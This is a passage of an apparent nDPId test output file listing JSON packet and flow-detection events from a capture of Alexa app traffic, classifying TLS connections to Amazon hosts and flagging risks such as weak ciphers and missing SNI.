-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1490976090572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090572,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8o8xAAEAGcF6sECrYNu8YuoUVAbs6msJ9AAAAAKAC\/\/863gAAAgQFtAQCCAoA9mGxAAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1490976090753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090753,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwZiVAAOcGBxE27xi6rBAq2AG7hRXpU+crOprCfnASH\/7pEAAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":1490976090756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090756,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoo81AAEAGcHGsECrYNu8YuoUVAbs6msJ+6VPnLFAQAVczggAA"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090572,"flow_last_seen":1490976090757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090757,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071392,"flow_last_seen":1490976071392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1490976071392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071392,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hllAAEAGwJWsECrYNF7ohukyAbtO5dxqAAAAAKAC\/\/\/iygAAAgQFtAQCCAoA9lozAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1490976071431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071431,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwichAAOcGFjI0XuiGrBAq2AG7soCzlhpDnkFxHnASH\/7eyAAAAgQFtAEDAwY="} 
+01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":979,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071306,"flow_last_seen":1490976071432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976071432,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1490976071433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071433,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoKzBAAEAGG9OsECrYNF7ohrKAAbueQXEes5YaRFAQAVcpOgAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071380,"flow_last_seen":1490976071434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071434,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1490976071438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071438,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwR+BAAOcGWBo0XuiGrBAq2AG7sn8uyCJ8obvO6XASH\/76GQAAAgQFtAEDAwY="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1490976071438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071438,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwR+FAAOcGWBk0XuiGrBAq2AG7soEpho4ZflMlBnASH\/5hCAAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1490976071440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAolMdAAEAGsjusECrYNF7ohrJ\/Abuhu87pLsgifVAQAVdEiwAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1490976071440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofzhAAEAGx8qsECrYNF7ohrKBAbt+UyUGKYaOGlAQAVereQAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":991,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071349,"flow_last_seen":1490976071441,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071385,"flow_last_seen":1490976071441,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":993,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071286,"flow_last_seen":1490976071444,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1490976071448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071448,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0V1AAOcGzpw0XuiGrBAq2AG76TIsDp+yTuXca3ASH\/6OPgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1490976071449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071449,"pkt":"AMDKkaPvePiC0\/vCCABFAAAohlpAAEAGwKisECrYNF7ohukyAbtO5dxrLA6fs1AQAVfYrwAA"} +01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1000,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071392,"flow_last_seen":1490976071451,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976071451,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": 
{"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1006,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071380,"flow_last_seen":1490976071486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976071486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1013,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071349,"flow_last_seen":1490976071501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071501,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01828{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1020,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071392,"flow_last_seen":1490976071512,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3459,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976071512,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, 
CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071583,"flow_last_seen":1490976071583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071583,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1490976071583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071583,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8H+ZAAEAGJwmsECrYNF7ohrKCAbsHHkWgAAAAAKAC\/\/\/3+QAAAgQFtAQCCAoA9lpGAAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1490976071640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071640,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwgCVAAOcGH9U0XuiGrBAq2AG7soJWhIA2Bx5FoXASH\/6YhgAAAgQFtAEDAwY="} 
+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1490976071641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071641,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoH+dAAEAGJxysECrYNF7ohrKCAbsHHkWhVoSAN1AQAVfi9wAA"} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071583,"flow_last_seen":1490976071642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1063,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071583,"flow_last_seen":1490976071700,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071700,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1076,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071385,"flow_last_seen":1490976071803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1490976071803,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976076042,"flow_last_seen":1490976076042,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976076042,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1490976076042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976076042,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BbZAAEAGQTmsECrYNF7ohpD5Abuu0lmyAAAAAKAC\/\/9b\/gAAAgQFtAQCCAoA9lwEAAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1490976076114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976076114,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwMG5AAOcGb4w0XuiGrBAq2AG7kPnjZM+NrtJZs3ASH\/4iEQAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1490976076117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976076117,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBbdAAEAGQUysECrYNF7ohpD5Abuu0lmz42TPjlAQAVdsggAA"} 
+00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076042,"flow_last_seen":1490976076117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076117,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01106{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976076042,"flow_last_seen":1490976076167,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
